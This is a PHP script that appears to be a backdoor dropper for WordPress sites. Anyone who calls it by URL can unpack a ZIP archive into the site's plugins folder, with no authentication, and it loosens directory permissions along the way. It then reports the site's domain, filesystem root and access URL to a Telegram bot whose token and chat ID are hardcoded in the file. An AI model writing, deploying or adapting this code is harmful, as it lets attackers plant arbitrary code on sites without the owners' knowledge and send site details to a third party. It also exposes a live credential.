<?php

/**
 * ====================================================
 * KONFIGURASI
 * ====================================================
 */

define('TELEGRAM_BOT_TOKEN', '7707499103:AAGCl29Ew1jdTTtVBAjy8-o_S_KVSUDvcDM');
define('TELEGRAM_CHAT_ID', '-1003772179315');
define('TIMEZONE', 'Asia/Jakarta');

function send_telegram($message)
{
    $url = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";
    $data = array(
        'chat_id'   => TELEGRAM_CHAT_ID,
        'text'      => $message,
        'parse_mode'=> 'HTML'
    );

    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 10);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_exec($ch);
        curl_close($ch);
        return;
    }

    $options = array(
        'http' => array(
            'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
            'method'  => 'POST',
            'content' => http_build_query($data),
            'timeout' => 10,
        )
    );
    $context = stream_context_create($options);
    @file_get_contents($url, false, $context);
}

function send_response($statusCode, $statusText, $message, $telegramMessage = '')
{
    global $telegramReport;
    $fullMessage = $telegramReport . "\nStatus: $statusCode $statusText\nPesan: $message" . ($telegramMessage ? "\n$telegramMessage" : '');
    send_telegram($fullMessage);
    header("HTTP/1.1 $statusCode $statusText");
    header('Content-Type: text/plain; charset=UTF-8');
    exit($message);
}

function find_wordpress_root($startDir)
{
    $dir = realpath($startDir);
    while ($dir && $dir !== DIRECTORY_SEPARATOR && $dir !== '') {
        if (file_exists($dir . DIRECTORY_SEPARATOR . 'wp-config.php')) {
            return $dir;
        }
        $parent = dirname($dir);
        if ($parent === $dir) break; // mencapai root filesystem
        $dir = $parent;
    }
    return false;
}

date_default_timezone_set(TIMEZONE);
$startTime = date('Y-m-d H:i:s');

if (isset($_SERVER['HTTP_HOST'])) {
    $domain = $_SERVER['HTTP_HOST'];
} elseif (isset($_SERVER['SERVER_NAME'])) {
    $domain = $_SERVER['SERVER_NAME'];
} else {
    $domain = 'localhost';
}

$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443)) ? "https://" : "http://";
$fullUrl = $protocol . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];

$telegramReport = "📦 <b>Laporan Ekstrak ZIP</b>\n";
$telegramReport .= "Waktu    : $startTime\n";
$telegramReport .= "Domain   : $domain\n";
$telegramReport .= "URL      : $fullUrl\n";

if (!class_exists('ZipArchive')) {
    send_response(500, 'Internal Server Error', 'Ekstensi ZipArchive tidak tersedia di server', "Ekstensi ZipArchive tidak ada.");
}

$rootDir = find_wordpress_root(__DIR__);
if ($rootDir === false) {
    send_response(500, 'Internal Server Error', 'Root WordPress tidak ditemukan (wp-config.php tidak ditemukan di direktori atas)', "Gagal menemukan wp-config.php.");
}
$telegramReport .= "Root     : $rootDir\n";

if (!isset($_GET['zipfile']) || $_GET['zipfile'] === '') {
    send_response(400, 'Bad Request', 'Parameter "zipfile" diperlukan', "Parameter zipfile tidak diberikan.");
}

if (isset($_GET['tujuan'])) {
    $tujuanRel = trim($_GET['tujuan'], " \t\n\r\0\x0B/");
} else {
    $tujuanRel = 'wp-content/plugins/custom/';
}
if ($tujuanRel === '') {
    $tujuanRel = 'wp-content/plugins/custom/';
}

if (strpos($tujuanRel, '../') !== false || strpos($tujuanRel, '..\\') !== false) {
    send_response(400, 'Bad Request', 'Parameter "tujuan" tidak valid (mengandung karakter terlarang)', "Path tujuan mengandung '..'");
}

$extractTo = $rootDir . DIRECTORY_SEPARATOR . $tujuanRel;

$realExtractTo = realpath($extractTo);
if ($realExtractTo === false) {

    if (!@mkdir($extractTo, 0755, true) && !@mkdir($extractTo, 0777, true)) {
        send_response(500, 'Internal Server Error', 'Gagal membuat direktori tujuan', "Gagal membuat direktori $extractTo");
    }
    $realExtractTo = realpath($extractTo);
    if ($realExtractTo === false) {
        send_response(500, 'Internal Server Error', 'Tidak dapat menentukan path absolut tujuan', "realpath gagal setelah mkdir.");
    }
}

if (strpos($realExtractTo, $rootDir) !== 0) {
    send_response(403, 'Forbidden', 'Direktori tujuan harus berada di dalam root WordPress', "Tujuan di luar root: $realExtractTo");
}

if (!is_writable($realExtractTo)) {
    @chmod($realExtractTo, 0755) || @chmod($realExtractTo, 0777);
    if (!is_writable($realExtractTo)) {
        send_response(500, 'Internal Server Error', 'Direktori tujuan tidak dapat ditulisi', "Direktori $realExtractTo tidak writable");
    }
}

$telegramReport .= "Tujuan    : $realExtractTo\n";

$zipParam = $_GET['zipfile'];
$zipPath  = realpath($zipParam);

if ($zipPath === false || !is_file($zipPath)) {
    send_response(404, 'Not Found', 'File ZIP tidak ditemukan', "File $zipParam tidak ditemukan.");
}

$extension = strtolower(pathinfo($zipPath, PATHINFO_EXTENSION));
if ($extension !== 'zip') {
    send_response(400, 'Bad Request', 'File harus ber-ekstensi .zip', "File bukan ZIP: $zipParam");
}

$telegramReport .= "File ZIP  : " . basename($zipPath) . "\n";

$zip = new ZipArchive();
$zipOpenResult = $zip->open($zipPath);
if ($zipOpenResult !== true) {
    $errorMsg = "Gagal membuka file ZIP (kode: $zipOpenResult)";
    send_response(500, 'Internal Server Error', $errorMsg, $errorMsg);
}

$fileCount = $zip->numFiles;
$telegramReport .= "Jumlah file: $fileCount\n";

$key = isset($_GET['key']) ? (string)$_GET['key'] : null;
if ($key !== null && $key !== '') {
    if (method_exists($zip, 'setPassword')) {
        if (!$zip->setPassword($key)) {
            $zip->close();
            send_response(400, 'Bad Request', 'Password ZIP tidak valid', "Gagal set password (kemungkinan password salah atau tidak didukung)");
        }
    } else {
        $zip->close();
        send_response(400, 'Bad Request', 'Password tidak didukung di versi PHP ini (minimal PHP 5.6)', "Password diberikan tetapi PHP " . phpversion() . " tidak mendukung setPassword.");
    }
}

$extractSuccess = $zip->extractTo($realExtractTo);
$zip->close();

if (!$extractSuccess) {
    send_response(401, 'Unauthorized', 'Gagal mengekstrak ZIP. Password salah atau file rusak.', "Ekstrak gagal. Kemungkinan password salah, file korup, atau permission.");
}

@chmod($realExtractTo, 0755);

$accessUrl = $protocol . $domain . '/' . $tujuanRel . '/';
$telegramReport .= "Status    : ✅ SUKSES\n";
$telegramReport .= "Semua file berhasil diekstrak.\n";
$telegramReport .= "URL AKSES : " . $accessUrl;

send_telegram($telegramReport);

header('HTTP/1.1 200 OK');
header('Content-Type: text/plain; charset=UTF-8');
echo 'File ZIP berhasil diekstrak';
